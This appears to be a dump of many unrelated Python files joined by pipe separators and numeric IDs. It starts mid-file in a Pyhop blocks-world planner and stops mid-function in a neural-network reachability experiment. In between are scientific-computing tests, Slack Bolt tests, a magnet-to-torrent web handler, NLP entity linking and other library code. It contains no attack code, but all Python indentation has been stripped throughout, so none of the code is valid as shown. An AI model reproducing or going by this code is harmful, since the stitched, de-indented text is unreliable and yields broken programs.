if b1 == indirect_object :
print("In the condition of indirect object in arm")
if direct_object_status == 'clear' :
# print("direct object status is clear")
return 'move-to-block'
else:
# print("direct object status is not clear")
return 'move-to-table'
if ((not(b1 == direct_object)) and (not(b1== indirect_object))) :
# print("The object in arm not in goal")
return 'move-to-table'
elif status == 'clear':
# print("In the condition of status is clear")
if ((not(b1 == direct_object)) and (not(b1== indirect_object))) :
# print("In the condition of block not in goal")
if last_position == direct_object or last_position == indirect_object:
# print("In the condition of last position in direct object or indirect object")
return 'move-to-table'
if b1 == indirect_object:
# print("In the condition of indirect object")
if direct_object_status == 'clear':
# print("In the condition of direct object status is clear")
return 'move-to-block'
elif last_position == direct_object:
# print("In the condition of last_position == direct object")
return 'done'
elif last_position == 'table':
return 'waiting'
else:
# print("In the condition of else of last_position == direct object")
return 'move-to-table'
if b1 == direct_object:
print("In the condition of direct object")
if last_position == indirect_object :
# print("In the condition of last_position == direct object")
return 'move-to-table'
if (not last_position == 'table') and (not (last_position == indirect_object)) and (not(get_last_clear_status(state, indirect_object) == 'clear')) :
return 'move-to-table'
else:
return 'waiting'
'''
if top_position:
print("top position is not none")
if not (top_position == indirect_object):
print("In the condition of else of last_position == direct object")
return 'move-to-table'
'''
else :
return 'waiting'
'''
if is_done(b1,state,goal):
#print("done")
return 'done'
elif not (get_last_clear_status(state, b1) or get_last_position(state, b1) == "hand"):
#print('inaccessible')
return 'inaccessible'
elif not (get_last_clear_status(state, b1) or get_last_position(state, b1) == "hand"):
#print('inaccessible')
return 'inaccessible'
elif not (b1 in goal_pos_dic) or str(goal_pos_dic[b1]).strip() == 'table':
#print("move to table")
return 'move-to-table'
elif is_done(goal_pos_dic[b1],state,goal) and get_last_clear_status(state, goal_pos_dic[b1]):
#print("move to block")
return 'move-to-block'
else:
#print("waiting")
return 'waiting'
'''
"""
In each Pyhop planning method, the first argument is the current state (this is analogous to Python methods, in which the first argument is the class instance). The rest of the arguments must match the arguments of the task that the method is for. For example, ('pickup', b1) has a method get_m(state,b1), as shown below.
"""
### methods for "move_blocks"
def moveb_m(state,goal):
"""
This method implements the following block-stacking algorithm:
If there's a block that can be moved to its final position, then
do so and call move_blocks recursively. Otherwise, if there's a
block that needs to be moved and can be moved to the table, then
do so and call move_blocks recursively. Otherwise, no blocks need
to be moved.
"""
for b1 in all_blocks(state):
# print("___block: " + b1)
#raw_input('Enter ...')
s = status(b1,state,goal)
# print("")
# print("")
# print("result")
# print(s)
# raw_input("enter")
if s == 'move-to-table':
print("___move one")
return [('move_one',b1,'table'),('move_blocks',goal)]
elif s == 'move-to-block':
# if not get_status_in_arm(state):
return [('move_one',b1,goal_pos_dic[b1]), ('move_blocks',goal)]
else:
if s == 'done':
return []
# print("continue")
continue
return []
'''
#
# if we get here, no blocks can be moved to their final locations
b1 = pyhop.find_if(lambda x: status(x,state,goal) == 'waiting', all_blocks(state))
if b1 != None:
return [('move_one',b1,'table'), ('move_blocks',goal)]
#
# if we get here, there are no blocks that need moving
return []
'''
"""
declare_methods must be called once for each taskname. Below, 'declare_methods('get',get_m)' tells Pyhop that 'get' has one method, get_m. Notice that 'get' is a quoted string, and get_m is the actual function.
"""
### methods for "move_one"
def move1(state,b1,dest):
"""
Generate subtasks to get b1 and put it at dest.
"""
# print("in move 1")
# print(get_last_position(state, b1))
# print(get_last_clear_status(state, b1))
if get_last_position(state, b1) == "in-arm":
return [('put', b1,dest)]
elif get_last_clear_status(state, b1) == 'not clear' :
return [('unstack_task',get_top_status(state, b1)),('putdown',get_top_status(state, b1)),('release', get_top_status(state, b1)) ,('get', b1), ('put', b1,dest)]
elif get_last_clear_status(state, dest) == 'not clear' :
return [('unstack_task',get_top_status(state, dest)),('putdown',get_top_status(state, dest)),('release', get_top_status(state, dest)) ,('get', b1), ('put', b1,dest)]
else:
return [('get', b1), ('put', b1,dest)]
### methods for "get"
def get_by_unstack(state,b1):
"""Generate a pickup subtask."""
#if get_last_clear_status(state, b1) == 'clear':
return [('unstack_task',b1)]
#return False
def get_m(state,b1):
"""Generate a pickup subtask."""
'''
print("listing positions")
print("green block")
print(get_last_position(state, 'green block'))
print("red block")
print(get_last_position(state, 'red block'))
print("blue block")
print(get_last_position(state, 'blue block'))
print("listing status")
print("green block")
print(get_last_clear_status(state, 'green block'))
print("red block")
print(get_last_clear_status(state, 'red block'))
print("blue block")
print(get_last_clear_status(state, 'blue block'))
'''
if get_last_clear_status(state, b1) == 'clear' and get_last_position(state, b1) == 'table':
return [('pickup_task',b1)]
elif get_last_clear_status(state, b1) == 'clear' and get_last_position(state, b1) != 'table':
return [('unstack_task',b1)]
elif get_last_clear_status(state, b1) == 'not clear' :
return [('pickup_task',b1)]
return False
def put_m(state,b1,b2):
"""
Generate either a putdown or a stack subtask for b1.
b2 is b1's destination: either the table or another block.
"""
'''
print("listing positions")
print("green block")
print(get_last_position(state, 'green block'))
print("red block")
print(get_last_position(state, 'red block'))
print("blue block")
print(get_last_position(state, 'blue block'))
print("listing status")
print("green block")
print(get_last_clear_status(state, 'green block'))
print("red block")
print(get_last_clear_status(state, 'red block'))
print("blue block")
print(get_last_clear_status(state, 'blue block'))
'''
if get_last_position(state, b1) == 'in-arm':
if b2 == 'table':
return [('putdown',b1), ('release', b1), ('raising', b1)]
else:
return [('stack',b1,b2), ('release', b1), ('raising', b1)]
else:
return False
def put_out_m(state, b1):
if state.fire[b1]:
return [("putoutfire", b1)]
else:
return []
def quick_apprehend_m(state, perp):
if state.free[perp]:
return [("apprehend", perp)]
else:
return []
def long_apprehend_m(state, perp):
if state.free[perp]:
return [("searchfor", perp), ("searchfor", perp), ("searchfor", perp), ("searchfor", perp), ("apprehend", perp)]
else:
return []
def declare_methods():
modified_pyhop.declare_methods("point_at", point_at_m)
modified_pyhop.declare_methods("achieve_goals", achieve_goals_m)
modified_pyhop.declare_methods("put_out", put_out_m)
modified_pyhop.declare_methods('put',put_m)
modified_pyhop.declare_methods('unstack_task',unstack_m)
modified_pyhop.declare_methods('pickup_task',pickup_m)
modified_pyhop.declare_methods('get',get_m)
modified_pyhop.declare_methods('move_one',move1)
modified_pyhop.declare_methods('move_blocks',moveb_m)
|
11520558
|
import time
from math import factorial
import scipy.special
import scipy.spatial
import numpy as np
import tectosaur as tct
from tectosaur.mesh.modify import concat
from tectosaur.fmm.tsfmm import *
import tectosaur.util.gpu as gpu
def fmm_tester(K_name, far_only = False, one_cell = False):
np.random.seed(123987)
for order in [8]:#range(2, 13):
float_type = np.float64
quad_order = 2
K_params = np.array([1.0, 0.25])
n = 20
offset = 0.0
if far_only:
offset = 6.0
if far_only and one_cell:
offset = 9.0
corners = [[-1.0, -1.0, 0], [-1.0, 1.0, 0], [1.0, 1.0, 0], [1.0, -1.0, 0]]
m_src = tct.make_rect(n, n, corners)
v = np.random.rand(m_src[1].shape[0] * 9).astype(float_type)
m_obs = tct.make_rect(n, n, corners)
m_obs[0][:,0] += offset
full_m = concat(m_src, m_obs)
src_subset = np.arange(0, m_src[1].shape[0])
obs_subset = np.arange(0, m_obs[1].shape[0]) + m_src[1].shape[0]
op = tct.TriToTriDirectFarfieldOp(
quad_order, K_name, K_params, full_m[0], full_m[1],
float_type, obs_subset, src_subset
)
y1 = op.dot(v)
max_pts_per_cell = 2
if one_cell:
max_pts_per_cell = int(1e9)
fmm = TSFMM(
m_obs, m_src, params = K_params, order = order,
quad_order = quad_order, float_type = float_type,
K_name = K_name,
mac = 2.5, max_pts_per_cell = max_pts_per_cell,
n_workers_per_block = 128
)
if far_only:
assert(fmm.interactions.p2p.src_n_idxs.shape[0] == 0)
report_interactions(fmm)
y2 = fmm.dot(v)
print(order, np.linalg.norm((y1 - y2)) / np.linalg.norm(y1))
print(y1, y2)
np.testing.assert_almost_equal(y1, y2, 5)
def test_fmmU():
fmm_tester('elasticU3')
def test_fmmT():
fmm_tester('elasticRT3')
def test_fmmA():
fmm_tester('elasticRA3')
def test_fmmH():
fmm_tester('elasticRH3')
def benchmark():
compare = False
np.random.seed(123456)
float_type = np.float32
n = 1000
K_name = 'elasticRH3'
corners = [[-1.0, -1.0, 0], [-1.0, 1.0, 0], [1.0, 1.0, 0], [1.0, -1.0, 0]]
m = tct.make_rect(n, n, corners)
v = (100000 * np.random.rand(m[1].shape[0] * 9)).astype(float_type)
t = tct.Timer()
if compare:
all_tris = np.arange(m[1].shape[0])
op = tct.TriToTriDirectFarfieldOp(
2, K_name, [1.0, 0.25], m[0], m[1],
float_type, all_tris, all_tris
)
t.report('build direct')
for i in range(2):
y1 = op.dot(v)
t.report('op.dot direct')
all_tris = np.arange(m[1].shape[0])
oldfmm = tct.FMMFarfieldOp(4.0, 400, 1e-5)(
2, K_name, [1.0, 0.25], m[0], m[1],
float_type, all_tris, all_tris
)
t.report('build oldfmm')
for i in range(2):
oldfmm.dot(v)
t.report('op.dot oldfmm')
# TODO: still maybe some room in p2p compared to direct
# TODO: maybe do full fmm?
fmm = TSFMM(
m, m, params = np.array([1.0, 0.25]), order = 4,
K_name = K_name, quad_order = 2, float_type = float_type,
mac = 2.5, max_pts_per_cell = 80, n_workers_per_block = 128
)
report_interactions(fmm)
t.report('build')
out = fmm.dot(v)
t.report('first dot')
out = fmm.dot(v)
t.report('second dot')
for i in range(1):
start = time.time()
out = fmm.dot(v)
t.report('third dot')
took = time.time() - start
interactions = m[1].shape[0] ** 2
print('million rows/sec', m[1].shape[0] / took / 1e6)
print('billion interactions/sec', interactions / took / 1e9)
filename = 'tests/fmm/taylorbenchmarkcorrect.npy'
# np.save(filename, out)
correct = np.load(filename)
# print(out, correct, y1)
np.testing.assert_almost_equal(out, correct, 5)
if __name__ == "__main__":
benchmark()
|
11520601
|
import ee
from ee_plugin import Map
image = ee.Image('USDA/NAIP/DOQQ/m_3712213_sw_10_1_20140613')
Map.setCenter(-122.466123, 37.769833, 17)
Map.addLayer(image, {'bands': ['N', 'R','G']}, 'NAIP')
|
11520610
|
import asyncio
import json
from time import time
from typing import Optional
import pytest
from slack_sdk.oauth.installation_store.async_installation_store import (
AsyncInstallationStore,
)
from slack_sdk.signature import SignatureVerifier
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.app.async_app import AsyncApp
from slack_bolt.error import BoltError
from slack_bolt.request.async_request import AsyncBoltRequest
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
assert_auth_test_count_async,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
valid_token = "<KEY>"
class MyInstallationStore(AsyncInstallationStore):
def __init__(self):
self.delete_bot_called = False
self.delete_installation_called = False
self.delete_all_called = False
async def async_delete_bot(
self, *, enterprise_id: Optional[str], team_id: Optional[str]
) -> None:
self.delete_bot_called = True
async def async_delete_installation(
self,
*,
enterprise_id: Optional[str],
team_id: Optional[str],
user_id: Optional[str] = None
) -> None:
self.delete_installation_called = True
async def async_delete_all(
self, *, enterprise_id: Optional[str], team_id: Optional[str]
):
self.delete_all_called = True
return await super().async_delete_all(
enterprise_id=enterprise_id, team_id=team_id
)
class TestEventsTokenRevocations:
signing_secret = "secret"
valid_token = "<KEY>"
mock_api_server_base_url = "http://localhost:8888"
signature_verifier = SignatureVerifier(signing_secret)
web_client = AsyncWebClient(token=None, base_url=mock_api_server_base_url)
@pytest.fixture
def event_loop(self):
old_os_env = remove_os_env_temporarily()
try:
setup_mock_web_api_server(self)
loop = asyncio.get_event_loop()
yield loop
loop.close()
cleanup_mock_web_api_server(self)
finally:
restore_os_env(old_os_env)
def generate_signature(self, body: str, timestamp: str):
return self.signature_verifier.generate_signature(
body=body,
timestamp=timestamp,
)
def build_headers(self, timestamp: str, body: str):
return {
"content-type": ["application/json"],
"x-slack-signature": [self.generate_signature(body, timestamp)],
"x-slack-request-timestamp": [timestamp],
}
@pytest.mark.asyncio
async def test_no_installation_store(self):
self.web_client.token = valid_token
app = AsyncApp(
client=self.web_client,
signing_secret=self.signing_secret,
)
with pytest.raises(BoltError):
app.default_tokens_revoked_event_listener()
with pytest.raises(BoltError):
app.default_app_uninstalled_event_listener()
with pytest.raises(BoltError):
app.enable_token_revocation_listeners()
@pytest.mark.asyncio
async def test_tokens_revoked(self):
app = AsyncApp(
client=self.web_client,
signing_secret=self.signing_secret,
installation_store=MyInstallationStore(),
)
event_payload = {
"token": "verification-token",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {
"type": "tokens_revoked",
"tokens": {"oauth": ["W111"], "bot": ["W222"]},
},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1606805974,
}
timestamp, body = str(int(time())), json.dumps(event_payload)
request: AsyncBoltRequest = AsyncBoltRequest(
body=body, headers=self.build_headers(timestamp, body)
)
response = await app.async_dispatch(request)
assert response.status == 404
# Enable the built-in event listeners
app.enable_token_revocation_listeners()
response = await app.async_dispatch(request)
assert response.status == 200
# auth.test API call must be skipped
await assert_auth_test_count_async(self, 0)
await asyncio.sleep(1) # wait a bit after auto ack()
assert app.installation_store.delete_bot_called is True
assert app.installation_store.delete_installation_called is True
assert app.installation_store.delete_all_called is False
@pytest.mark.asyncio
async def test_app_uninstalled(self):
app = AsyncApp(
client=self.web_client,
signing_secret=self.signing_secret,
installation_store=MyInstallationStore(),
)
event_payload = {
"token": "<PASSWORD>",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {"type": "app_uninstalled"},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1606805974,
}
timestamp, body = str(int(time())), json.dumps(event_payload)
request: AsyncBoltRequest = AsyncBoltRequest(
body=body, headers=self.build_headers(timestamp, body)
)
response = await app.async_dispatch(request)
assert response.status == 404
# Enable the built-in event listeners
app.enable_token_revocation_listeners()
response = await app.async_dispatch(request)
assert response.status == 200
# auth.test API call must be skipped
await assert_auth_test_count_async(self, 0)
await asyncio.sleep(1) # wait a bit after auto ack()
assert app.installation_store.delete_bot_called is True
assert app.installation_store.delete_installation_called is True
assert app.installation_store.delete_all_called is True
|
11520625
|
import streamlit as st
import pandas as pd
st.write(1234)
st.write(
pd.DataFrame({"first column": [1, 2, 3, 4], "second column": [10, 20, 30, 40]})
)
|
11520651
|
import glob
import os
import freetype
import pytest
test_folder = os.path.realpath(os.path.dirname(__file__))
def test_load_ft_face():
"""A smoke test."""
p = os.path.join(test_folder, "..", "examples", "Vera.ttf")
assert freetype.Face(p)
def test_load_ft_face_from_memory():
"""Another smoke test."""
p = os.path.join(test_folder, "..", "examples", "Vera.ttf")
with open(p, mode="rb") as f:
assert freetype.Face(f)
with open(p, mode="rb") as f:
byte_stream = f.read()
assert freetype.Face.from_bytes(byte_stream)
def test_bundle_version():
module_dir = os.path.dirname(freetype.__file__)
shared_object = glob.glob(os.path.join(module_dir, "libfreetype*"))
if shared_object:
import re
p = os.path.join(test_folder, "..", "setup-build-freetype.py")
with open(p) as f:
m = re.findall(r"freetype-(\d+)\.(\d+)\.?(\d+)?\.tar", f.read())
version = m[0]
if not version[2]:
version = (int(version[0]), int(version[1]), 0)
else:
version = (int(version[0]), int(version[1]), int(version[2]))
assert freetype.version() == version
else:
pytest.skip("Not using a bundled FreeType library.")
|
11520678
|
from copy import copy
from hwt.doc_markers import internal
from hwt.hdl.types.bits import Bits
from hwt.hdl.types.defs import INT
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.mainBases import RtlSignalBase
def slice_member_to_hval(v):
if isinstance(v, RtlSignalBase): # is signal
assert isinstance(v._dtype, Bits)
return v
elif isinstance(v, HValue):
if isinstance(v, Bits):
return v
else:
return v._auto_cast(INT)
else:
return INT.from_py(v)
class HSliceVal(HValue):
"""
HValue class for HSlice type
"""
@classmethod
def from_py(cls, typeObj, val, vld_mask=None):
assert vld_mask is None, vld_mask
if val is None:
val = slice(None, None, None)
else:
assert isinstance(val, slice), val
start = slice_member_to_hval(val.start)
stop = slice_member_to_hval(val.stop)
step = slice_member_to_hval(val.step)
val = slice(start, stop, step)
return cls(typeObj, val, vld_mask=1)
def _is_full_valid(self):
v = self.val
return v.start._is_full_valid() and v.stop._is_full_valid()
def to_py(self):
"""
Convert to python slice object
"""
v = self.val
return slice(int(v.start), int(v.stop), int(v.step))
def _size(self):
"""
:return: how many bits is this slice selecting
"""
assert isinstance(self, HValue)
v = self.val
if v.step == -1:
return int(v.start) - int(v.stop)
elif v.step == 1:
return int(v.stop) - int(v.start)
else:
raise NotImplementedError(self)
def _eq_val(self, other):
assert isinstance(other, HSliceVal)
return self.val == other.val
def _eq(self, other):
return self._eq__val(other)
def __lt__(self, other):
if self.val.step != other.val.step:
raise ValueError()
if isinstance(other, INT.getValueCls()):
return self.val.start < other
else:
return (self.val.start, self.val.stop) < (other.val.start, other.val.stop)
def __copy__(self):
v = HValue.__copy__(self)
v.val = copy(v.val)
return v
def staticEval(self):
v = self.val
new_v = slice(
v.start.staticEval(),
v.stop.staticEval(),
v.step.staticEval(),
)
return self.__class__.from_py(self._dtype, new_v)
@internal
def __hash__(self):
v = self.val
return hash((self._dtype, v.start, v.stop, v.step))
|
11520701
|
import pytest
from returns.context import (
RequiresContext,
RequiresContextFutureResult,
RequiresContextIOResult,
RequiresContextResult,
)
from returns.converters import flatten
from returns.future import Future, FutureResult
from returns.io import IO, IOFailure, IOSuccess
from returns.maybe import Nothing, Some
from returns.result import Failure, Success
@pytest.mark.parametrize(('container', 'merged'), [
# Flattens:
(IO(IO(1)), IO(1)),
(Success(Success({})), Success({})),
(IOSuccess(IOSuccess(1)), IOSuccess(1)),
(Some(Some(None)), Some(None)),
(Some(Some([])), Some([])),
# Nope:
(Nothing, Nothing),
(Failure(Failure('a')), Failure(Failure('a'))),
(Failure(Success('a')), Failure(Success('a'))),
(IOFailure(IOFailure('a')), IOFailure(IOFailure('a'))),
(IOFailure(IOSuccess('a')), IOFailure(IOSuccess('a'))),
])
def test_flatten(container, merged):
"""Ensures that `flatten` is always returning the correct type."""
assert flatten(container) == merged
@pytest.mark.parametrize(('container', 'merged'), [
(
RequiresContextResult.from_value(
RequiresContextResult.from_value(1),
),
RequiresContextResult.from_value(1),
),
(
RequiresContextIOResult.from_value(
RequiresContextIOResult.from_value(1),
),
RequiresContextIOResult.from_value(1),
),
(
RequiresContext.from_value(RequiresContext.from_value(1)),
RequiresContext.from_value(1),
),
])
def test_flatten_context(container, merged):
"""Ensures that `flatten` is always returning the correct type."""
assert flatten(container)(...) == merged(...)
@pytest.mark.anyio()
async def test_flatten_future(subtests):
"""Ensures that `flatten` is always returning the correct type."""
futures = [
# Flattens:
(Future.from_value(Future.from_value(1)), Future.from_value(1)),
(
FutureResult.from_value(FutureResult.from_value(1)),
FutureResult.from_value(1),
),
]
for container, merged in futures:
with subtests.test(container=container, merged=merged):
assert await flatten(container) == await merged # type: ignore
@pytest.mark.anyio()
async def test_flatten_context_future_result(subtests):
"""Ensures that `flatten` is always returning the correct type."""
futures = [
# Flattens:
(
RequiresContextFutureResult.from_value(
RequiresContextFutureResult.from_value(1),
),
RequiresContextFutureResult.from_value(1),
),
]
for container, merged in futures:
with subtests.test(container=container, merged=merged):
assert await flatten(
container,
)(...) == await merged(...)
@pytest.mark.anyio()
async def test_non_flatten_future(subtests):
"""Ensures that `flatten` is always returning the correct type."""
futures = [
# Not flattens:
FutureResult.from_failure(FutureResult.from_failure(1)),
FutureResult.from_failure(FutureResult.from_value(1)),
]
for cont in futures:
with subtests.test(container=cont):
assert isinstance(
(await flatten(cont)).failure()._inner_value, # noqa: WPS437
cont.__class__,
)
@pytest.mark.anyio()
async def test_non_flatten_context_future_result(subtests):
"""Ensures that `flatten` is always returning the correct type."""
futures = [
# Not flattens:
RequiresContextFutureResult.from_failure(
RequiresContextFutureResult.from_failure(1),
),
RequiresContextFutureResult.from_failure(
RequiresContextFutureResult.from_value(1),
),
]
for cont in futures:
with subtests.test(container=cont):
inner = await flatten(cont)(...)
assert isinstance(
inner.failure()._inner_value, # noqa: WPS437
cont.__class__,
)
|
11520711
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
rpcrechitprobability = DQMEDAnalyzer('RPCRecHitProbability',
SaveRootFile = cms.untracked.bool(False),
RootFileName = cms.untracked.string('RPCRecHitProbabilityDQM.root'),
MuonPtCut = cms.untracked.double(3.0),
MuonEtaCut= cms.untracked.double(1.9),
ScalersRawToDigiLabel = cms.InputTag('scalersRawToDigi'),
MuonLabel = cms.InputTag('muons'),
RPCFolder = cms.untracked.string('RPC'),
GlobalFolder = cms.untracked.string('SummaryHistograms/RecHits'),
MuonFolder = cms.untracked.string("Muon")
)
|
11520729
|
from django import forms
from django.utils.translation import gettext as _
from taggit.utils import edit_string_for_tags, parse_tags
class TagWidget(forms.TextInput):
def format_value(self, value):
if value is not None and not isinstance(value, str):
value = edit_string_for_tags(value)
return super().format_value(value)
class TagField(forms.CharField):
widget = TagWidget
def clean(self, value):
value = super().clean(value)
try:
return parse_tags(value)
except ValueError:
raise forms.ValidationError(
_("Please provide a comma-separated list of tags.")
)
def has_changed(self, initial_value, data_value):
# Always return False if the field is disabled since self.bound_data
# always uses the initial value in this case.
if self.disabled:
return False
try:
data_value = self.clean(data_value)
except forms.ValidationError:
pass
if initial_value is None:
initial_value = []
initial_value = [tag.name for tag in initial_value]
initial_value.sort()
return initial_value != data_value
|
11520761
|
from typing import Optional
from cython_vst_loader.vst_constants import VstEventTypes
class VstEvent:
def __init__(self):
self.type: Optional[int] = None
self.byte_size: Optional[int] = None
self.delta_frames: Optional[int] = None
self.flags: Optional[int] = None
self.data: Optional[bytes] = None
def is_midi(self) -> bool:
return self.type == VstEventTypes.kVstMidiType
class VstMidiEvent(VstEvent):
_NOTE_ON: str = 'note_on'
_NOTE_OFF: str = 'note_off'
def __init__(self, delta_frames: int):
super().__init__()
self.delta_frames = delta_frames
self.type: int = VstEventTypes.kVstMidiType
self.flags = 0
self.note_length: Optional[int] = None
self.note_offset: Optional[int] = None
self.midi_data: bytearray = bytearray([0, 0, 0, 0])
self.detune: int = 0
self.note_off_velocity: int = 0
self.reserved1: int = 0
self.reserved2: int = 0
@classmethod
def _midi_note_as_bytes(cls, note: int, velocity: int = 100, kind: str = 'note_on', channel: int = 1) -> bytes:
"""
borrowed from here:
https://github.com/simlmx/pyvst/blob/ded9ff373f37d1cbe8948ccb053ff4849f45f4cb/pyvst/midi.py#L11
:param note:
:param velocity:
:param kind:
:param channel: Midi channel (those are 1-indexed)
"""
if kind == cls._NOTE_ON:
kind_byte = b'\x90'[0]
elif kind == cls._NOTE_OFF:
kind_byte = b'\x80'[0]
else:
raise NotImplementedError('MIDI type {} not supported yet'.format(kind))
def _check_channel_valid(channel_to_check):
if not (1 <= channel_to_check <= 16):
raise ValueError('Invalid channel "{}". Must be in the [1, 16] range.'
.format(channel_to_check))
_check_channel_valid(channel)
return bytes([
(channel - 1) | kind_byte,
note,
velocity
])
class VstNoteOnMidiEvent(VstMidiEvent):
def __init__(self, delta_frames: int, note: int, velocity: int, channel: int):
super().__init__(delta_frames)
self.midi_data = self._midi_note_as_bytes(note, velocity, self._NOTE_ON, channel)
class VstNoteOffMidiEvent(VstMidiEvent):
def __init__(self, delta_frames: int, note: int, channel: int):
super().__init__(delta_frames)
self.midi_data = self._midi_note_as_bytes(note, 0, self._NOTE_OFF, channel)
|
11520777
|
import base64
from urllib.parse import quote
from aiohttp import web
from . import settings
from .core import Magnet2Torrent
from .utils import FailedToFetchException
routes = web.RouteTableDef()
@routes.get("/")
async def get_torrent(request):
if settings.SERVE_APIKEY and request.query.getone("apikey", None) != settings.SERVE_APIKEY:
raise web.HTTPUnauthorized()
try:
magnet = request.query["magnet"]
except:
return web.json_response({"status": "error", "message": "magnet argument missing from url"}, status=400, )
m2t = Magnet2Torrent(magnet, dht_server=settings.DHT_SERVER, torrent_cache_folder=settings.TORRENT_CACHE_FOLDER, )
try:
torrent = await m2t.retrieve_torrent()
except FailedToFetchException:
return web.json_response({"status": "error", "message": "failed to retrieve magnet link"}, status=500)
if request.query.getone("direct", None) is not None:
return web.Response(body=torrent.data_encode(),
headers={"Content-Disposition": "attachment; filename*=UTF-8''{}".format(
quote(torrent.name))},
)
else:
return web.json_response(
{"status": "success", "filename": torrent.name,
"torrent_data": base64.b64encode(torrent.data_encode()).decode("utf-8")}
)
|
11520785
|
from collections import defaultdict
from scispacy.abbreviation import AbbreviationDetector
from scispacy.linking import EntityLinker
class EntityLink:
def __init__(self, nlp, linkage_mode, data):
self.sents = data
self.nlp = nlp
self.linkage_mode = linkage_mode
def umls_entlink(self):
"""
Add UMLS entity linker and abbreviation detector to spaCy pipeline_ie
"""
abbreviation_pipe = AbbreviationDetector(self.nlp)
self.nlp.add_pipe(abbreviation_pipe)
linker = EntityLinker(resolve_abbreviations=True, name="umls")
self.nlp.add_pipe(linker)
def spacy_entlink(self):
"""
Extracts entities for given list of text using spacy entity linker.
:return:
- sents: list
- entities: dict
list of sentences and a dictionary where key is the sentence number and value its corresponding list of entities
"""
entities = defaultdict(list)
count = 0
for sentence in self.sents:
doc = self.nlp(sentence)
ents = [ent for ent in doc.ents]
entities[str(count)] = ents
count += 1
return self.sents, entities
def entity_linkage(self):
if self.linkage_mode == "umls":
self.umls_entlink()
return self.spacy_entlink()
elif self.linkage_mode == "spacy":
return self.spacy_entlink()
|
11520790
|
import nn_closed_loop.example as ex
import numpy as np
from tabulate import tabulate
import pandas as pd
import datetime
import os
import glob
import matplotlib.pyplot as plt
import argparse
import nn_closed_loop.dynamics as dynamics
import nn_closed_loop.analyzers as analyzers
import nn_closed_loop.constraints as constraints
from nn_closed_loop.utils.nn import load_controller
results_dir = "{}/results/logs/".format(
os.path.dirname(os.path.abspath(__file__))
)
os.makedirs(results_dir, exist_ok=True)
class Experiment:
def __init__(self):
self.info = {
('CROWN', 'Uniform'): {
'name': 'Reach-LP-Partition',
'color': 'tab:green',
'ls': '-',
},
('CROWN', 'None'): {
'name': 'Reach-LP',
'color': 'tab:green',
'ls': '--',
},
('SDP', 'Uniform'): {
'name': 'Reach-SDP-Partition',
'color': 'tab:red',
'ls': '-',
},
('SDP', 'None'): {
'name': 'Reach-SDP~\cite{hu2020reach}',
'color': 'tab:red',
'ls': '--',
},
('SeparableCROWN', 'None'): {
'name': 'CL-CROWN',
},
('SeparableSGIBP', 'None'): {
'name': 'CL-SG-IBP~\cite{xiang2020reachable}',
},
}
class CompareMultipleCombos(Experiment):
def __init__(self):
self.filename = results_dir + 'alg_error_{dt}_table.pkl'
Experiment.__init__(self)
def run(self):
dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')
parser = ex.setup_parser()
args = parser.parse_args()
args.save_plot = False
args.show_plot = False
args.make_animation = False
args.show_animation = False
args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
args.state_feedback = True
args.boundaries = "lp"
args.system = "double_integrator"
args.t_max = 5
args.estimate_runtime = True
expts = [
{
'partitioner': 'UnGuided',
'propagator': 'CROWN',
},
{
'partitioner': 'SimGuided',
'propagator': 'CROWN',
},
{
'partitioner': 'GreedySimGuided',
'propagator': 'CROWN',
},
]
df = pd.DataFrame()
for expt in expts:
for key, value in expt.items():
setattr(args, key, value)
stats, info = ex.main(args)
for i, runtime in enumerate(stats['runtimes']):
df = df.append({
**expt,
'run': i,
'runtime': runtime,
'final_step_error': stats['final_step_errors'][i],
'avg_error': stats['avg_errors'][i],
'output_constraint': stats['output_constraints'][i],
}, ignore_index=True)
df.to_pickle(self.filename.format(dt=dt))
def plot(self):
raise NotImplementedError
class CompareRuntimeVsErrorTable(Experiment):
def __init__(self):
self.filename = results_dir + 'runtime_vs_error_{dt}_table.pkl'
Experiment.__init__(self)
def run(self):
dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')
parser = ex.setup_parser()
args = parser.parse_args()
args.save_plot = False
args.show_plot = False
args.make_animation = False
args.show_animation = False
args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
args.state_feedback = True
args.boundaries = "lp"
args.system = "double_integrator"
args.t_max = 5
args.estimate_runtime = True
expts = [
{
'partitioner': 'None',
'propagator': 'SeparableCROWN',
},
{
'partitioner': 'None',
'propagator': 'SeparableSGIBP',
},
{
'partitioner': 'None',
'propagator': 'CROWN',
},
{
'partitioner': 'Uniform',
'num_partitions': "[4, 4]",
'propagator': 'CROWN',
},
{
'partitioner': 'None',
'propagator': 'SDP',
'cvxpy_solver': 'MOSEK',
},
{
'partitioner': 'Uniform',
'num_partitions': "[4, 4]",
'propagator': 'SDP',
'cvxpy_solver': 'MOSEK',
},
]
df = pd.DataFrame()
for expt in expts:
for key, value in expt.items():
setattr(args, key, value)
stats, info = ex.main(args)
for i, runtime in enumerate(stats['runtimes']):
df = df.append({
**expt,
'run': i,
'runtime': runtime,
'final_step_error': stats['final_step_errors'][i],
'avg_error': stats['avg_errors'][i],
'output_constraint': stats['output_constraints'][i],
'all_errors': stats['all_errors'][i],
}, ignore_index=True)
df.to_pickle(self.filename.format(dt=dt))
def grab_latest_groups(self):
# Grab latest file as pandas dataframe
list_of_files = glob.glob(self.filename.format(dt='*'))
latest_filename = max(list_of_files, key=os.path.getctime)
df = pd.read_pickle(latest_filename)
# df will have every trial, so group by which prop/part was used
groupby = ['propagator', 'partitioner']
grouped = df.groupby(groupby)
return grouped, latest_filename
def plot(self):
grouped, filename = self.grab_latest_groups()
# Setup table columns
rows = []
rows.append(["Algorithm", "Runtime [s]", "Error"])
tuples = []
tuples += [('SeparableCROWN', 'None'), ('SeparableSGIBP', 'None')]
tuples += [(prop, part) for part in ['None', 'Uniform'] for prop in ['SDP', 'CROWN']]
# Go through each combination of prop/part we want in the table
for prop_part_tuple in tuples:
try:
group = grouped.get_group(prop_part_tuple)
except KeyError:
continue
name = self.info[prop_part_tuple]['name']
